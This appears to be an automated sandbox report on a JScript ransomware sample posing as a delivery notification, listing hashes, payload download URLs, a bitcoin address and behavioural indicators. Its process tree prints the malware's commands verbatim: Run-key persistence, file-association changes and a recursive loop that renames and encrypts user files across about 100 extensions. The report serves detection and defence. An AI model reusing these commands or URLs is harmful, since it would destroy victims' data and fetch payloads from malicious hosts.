Analysis
max time kernel: 136s
max time network: 145s
platform: windows10_x64
resource: win10v20201028
submitted: 17-01-2021 18:02

Static task: static1
Behavioral task: behavioral1
  Sample: Delivery_Notification_00896328.doc.js
  Resource: win7v20201028
Behavioral task: behavioral2
  Sample: Delivery_Notification_00896328.doc.js
  Resource: win10v20201028
General
Target: Delivery_Notification_00896328.doc.js
Size: 248KB
MD5: 0168089428c6aa371f4275d0872b0970
SHA1: d2595c0a40c4d8dcf9f7c711f472abc6ac0f592e
SHA256: dc20c80a0c1db5848ceef6714c6d774f3002a0c595638aff0410ae2ddabb710a
SHA512: 915d7a3f63429a27dace53418d8b3216ef3b4b6ac82d63ecca6f1590aa7380449fb4fe3ec8eed5a9aa3a8dadeed5ef32091ecdf2e885aca8d998d8150d07f418
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\a.txt
19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
http://ferroli-lietuva.eu/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
http://georgina-collier.com/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
http://firstshow.info/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
http://gayathri.co.in/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
http://jackroubaud.com/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
Signatures

Blocklisted process makes network request (8 IoCs)
Processes: wscript.exe
flow | pid  | process
10   | 1308 | wscript.exe
11   | 1308 | wscript.exe
13   | 1308 | wscript.exe
16   | 1308 | wscript.exe
18   | 1308 | wscript.exe
20   | 1308 | wscript.exe
21   | 1308 | wscript.exe
23   | 1308 | wscript.exe
Modifies extensions of user files (7 IoCs)
Ransomware generally changes the extension on encrypted files.
Processes: cmd.exe
description  | ioc                                                                                             | process
File renamed | C:\Users\Admin\Pictures\CompressMount.tiff => C:\Users\Admin\Pictures\CompressMount.tiff.crypted | cmd.exe
File renamed | C:\Users\Admin\Pictures\RevokePush.tiff => C:\Users\Admin\Pictures\RevokePush.tiff.crypted       | cmd.exe
File renamed | C:\Users\Admin\Pictures\SyncEdit.tiff => C:\Users\Admin\Pictures\SyncEdit.tiff.crypted           | cmd.exe
File renamed | C:\Users\Admin\Pictures\StepCompress.tif => C:\Users\Admin\Pictures\StepCompress.tif.crypted     | cmd.exe
File renamed | C:\Users\Admin\Pictures\UndoSplit.tif => C:\Users\Admin\Pictures\UndoSplit.tif.crypted           | cmd.exe
File renamed | C:\Users\Admin\Pictures\ConvertExit.raw => C:\Users\Admin\Pictures\ConvertExit.raw.crypted       | cmd.exe
File renamed | C:\Users\Admin\Pictures\UpdateMerge.raw => C:\Users\Admin\Pictures\UpdateMerge.raw.crypted       | cmd.exe
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Adds Run key to start application (2 TTPs, 2 IoCs)
Processes: reg.exe
description     | ioc                                                                                                                                                                       | process
Key created     | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run                                                                | reg.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Crypted = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a.txt"     | reg.exe
Modifies registry class (7 IoCs)
Processes: reg.exe, reg.exe
description     | ioc                                                                                                                                  | process
Key created     | \REGISTRY\MACHINE\SOFTWARE\Classes\.crypted                                                                                          | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.crypted\ = "Crypted"                                                                             | reg.exe
Key created     | \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open\command                                                                        | reg.exe
Key created     | \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted                                                                                           | reg.exe
Key created     | \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell                                                                                     | reg.exe
Key created     | \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open                                                                                | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open\command\ = "notepad.exe \"C:\\Users\\Admin\\AppData\\Local\\Temp\\a.txt\""      | reg.exe
Suspicious use of WriteProcessMemory (18 IoCs)
Processes: wscript.exe, cmd.exe, cmd.exe, cmd.exe
description                      | pid  | process     | target process
PID 1308 wrote to memory of 208  | 1308 | wscript.exe | cmd.exe
PID 1308 wrote to memory of 208  | 1308 | wscript.exe | cmd.exe
PID 1308 wrote to memory of 200  | 1308 | wscript.exe | cmd.exe
PID 1308 wrote to memory of 200  | 1308 | wscript.exe | cmd.exe
PID 1308 wrote to memory of 812  | 1308 | wscript.exe | cmd.exe
PID 1308 wrote to memory of 812  | 1308 | wscript.exe | cmd.exe
PID 1308 wrote to memory of 1520 | 1308 | wscript.exe | cmd.exe
PID 1308 wrote to memory of 1520 | 1308 | wscript.exe | cmd.exe
PID 1308 wrote to memory of 3296 | 1308 | wscript.exe | cmd.exe
PID 1308 wrote to memory of 3296 | 1308 | wscript.exe | cmd.exe
PID 1308 wrote to memory of 728  | 1308 | wscript.exe | cmd.exe
PID 1308 wrote to memory of 728  | 1308 | wscript.exe | cmd.exe
PID 208 wrote to memory of 1768  | 208  | cmd.exe     | reg.exe
PID 208 wrote to memory of 1768  | 208  | cmd.exe     | reg.exe
PID 812 wrote to memory of 912   | 812  | cmd.exe     | reg.exe
PID 812 wrote to memory of 912   | 812  | cmd.exe     | reg.exe
PID 200 wrote to memory of 372   | 200  | cmd.exe     | reg.exe
PID 200 wrote to memory of 372   | 200  | cmd.exe     | reg.exe
Processes
C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Delivery_Notification_00896328.doc.js
    - Blocklisted process makes network request
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"
        - Suspicious use of WriteProcessMemory
        C:\Windows\system32\reg.exe
            REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"
            - Adds Run key to start application
    C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"
        - Suspicious use of WriteProcessMemory
        C:\Windows\system32\reg.exe
            REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"
            - Modifies registry class
    C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""
        - Suspicious use of WriteProcessMemory
        C:\Windows\system32\reg.exe
            REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""
            - Modifies registry class
    C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\AppData\Roaming\Desktop\DECRYPT.txt"
    C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\Desktop\DECRYPT.txt"
    C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c for /r "C:\" %i in (*.zip *.rar *.r00 *.r01 *.r02 *.r03 *.7z *.tar *.gz *.gzip *.arc *.arj *.bz *.bz2 *.bza *.bzip *.bzip2 *.ice *.xls *.xlsx *.doc *.docx *.pdf *.djvu *.fb2 *.rtf *.ppt *.pptx *.pps *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.class *.py *.pl *.h *.vb *.vcproj *.vbproj *.java *.bak *.backup *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.sql *.psd *.eps *.cdr *.cpt *.indd *.dwg *.ai *.svg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.jpeg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.mov *.3gp *.flv *.mkv *.vob *.rm *.mp3 *.wav *.asf *.wma *.m3u *.midi *.ogg *.mid *.vdi *.vmdk *.vhd *.dsk *.img *.iso) do (REN "%i" "%~nxi.crypted" & call C:\Users\Admin\AppData\Local\Temp\a0.exe "%i.crypted" nx4325ka8afy0z87t7xmrxbjokehkpiq0mc2)
        - Modifies extensions of user files
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Users\Admin\AppData\Local\Temp\a.txt
MD5: 512ad548377714262b373c665f17d1db
SHA1: 0f05efd559b90eb77418c32fa86cfcba77b6e187
SHA256: 27966b12ff9831318138b9cf663fd8e25e9469c347fe630a2c6a491bf125e2ca
SHA512: f0e7456eccd513a3b09ffe1411ba661716d37efeff6cdd06b00e7859c935655a0eb5e0d75deef9f56985ff360f41e61b8f2eefa819d0677c8aa72cfb2a788943

C:\Users\Admin\AppData\Local\Temp\a0.exe
MD5: 7c7ff5fdc3cc7705f4d42ec4e3eab8a5
SHA1: 98416dfe3086b4dfb2cbc8170b01e292ef30d982
SHA256: dc20be27348645f896c30914b3cbc66cdc7160702d3f307d3b1669095f483b27
SHA512: 77fee3199567ff012dd5f617b620bbcbd5eefb940a795063e42cdaa8b2d224e810d16ce7b88544c5a429f75f9c7a9434613be4276097a8a05d9ec7fa4daab9e9
Memory dumps
memory/200-3-0x0000000000000000-mapping.dmp
memory/208-2-0x0000000000000000-mapping.dmp
memory/372-11-0x0000000000000000-mapping.dmp
memory/728-7-0x0000000000000000-mapping.dmp
memory/812-4-0x0000000000000000-mapping.dmp
memory/912-9-0x0000000000000000-mapping.dmp
memory/1520-5-0x0000000000000000-mapping.dmp
memory/1768-8-0x0000000000000000-mapping.dmp
memory/3296-6-0x0000000000000000-mapping.dmp